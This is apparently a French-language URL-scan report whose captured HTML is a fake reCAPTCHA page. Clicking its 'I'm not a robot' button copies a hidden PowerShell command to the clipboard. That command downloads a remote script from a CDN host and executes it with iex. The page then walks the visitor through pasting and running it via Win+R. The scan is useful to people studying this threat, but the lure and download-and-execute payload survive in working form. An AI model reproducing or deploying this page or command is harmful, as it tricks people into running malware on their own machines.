- ID de l'analyse :
- 450440f4-a118-4e96-ab00-b8ce9256ce4dTerminée
- URL soumise :
- https://streamingsplays.com/go/b11f973d-01d4-4a5b-8af3-139daaa5443fRedirigé
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 3 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Messages de journal de console : 1 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>reCAPTCHA Verification</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
body, html { margin: 0; padding: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; font-family: Arial, sans-serif; background-color: #f9f9f9; position: relative; }
.container { background-color: #fff; padding: 20px; box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1); border-radius: 6px; text-align: center; max-width: 320px; position: relative; z-index: 5; transition: opacity 0.3s ease; }
.recaptcha-popup { display: none; }
.container img { width: 60px; margin-bottom: 20px; }
.container h1 { font-size: 18px; color: #333; margin-bottom: 10px; }
.container p { font-size: 14px; color: #666; margin-bottom: 20px; }
.recaptcha-button { display: inline-flex; align-items: center; padding: 8px 16px; background: #4285f4; color: #fff; border: none; border-radius: 5px; cursor: pointer; font-size: 14px; transition: background 0.3s; }
.recaptcha-button img { margin-right: 10px; width: 20px; }
.recaptcha-button:hover { background: #357ae8; }
.dimmed { opacity: 0.2; }
.recaptcha-popup { background: #fff; padding: 30px; border-radius: 10px; text-align: center; box-shadow: 0 0 20px rgba(0, 0, 0, 0.5); position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); z-index: 100; }
.recaptcha-popup h3 { margin: 0 0 15px; font-size: 22px; font-weight: bold; color: #333; }
.recaptcha-popup p { font-size: 16px; color: #333; margin: 10px 0; }
.overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); z-index: 50; }
.footer { margin-top: 20px; font-size: 12px; color: #999; }
.footer a { color: #999; text-decoration: none; }
.footer a:hover { text-decoration: underline; }
</style>
</head>
<body>
<div class="container" id="captchaContainer">
<img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA logo">
<h1>reCAPTCHA v2</h1>
<p>Please verify that you're not a robot by checking the box below.</p>
<div class="recaptcha-button" id="verifyButton">
<img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
<div class="footer">
<p>This site is protected by reCAPTCHA and the Google <a href="#">Privacy Policy</a> and <a href="#">Terms of Service</a> apply.</p>
</div>
</div>
<div class="overlay" id="overlay"></div>
<div class="recaptcha-popup" id="recaptchaPopup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "<i class="fab fa-windows"></i>" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
<script>
document.getElementById('verifyButton').addEventListener('click', function() {
const codeToCopy = "powershell.exe -W Hidden -command $url = 'https://newsystem-checkt.b-cdn.net/humansetup-v2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text";
const textArea = document.createElement('textarea');
textArea.value = codeToCopy;
document.body.appendChild(textArea);
textArea.select();
document.execCommand('copy');
document.body.removeChild(textArea);
document.getElementById('captchaContainer').classList.add('dimmed');
document.getElementById('overlay').style.display = 'block';
document.getElementById('recaptchaPopup').style.display = 'block';
});
</script>
</body></html>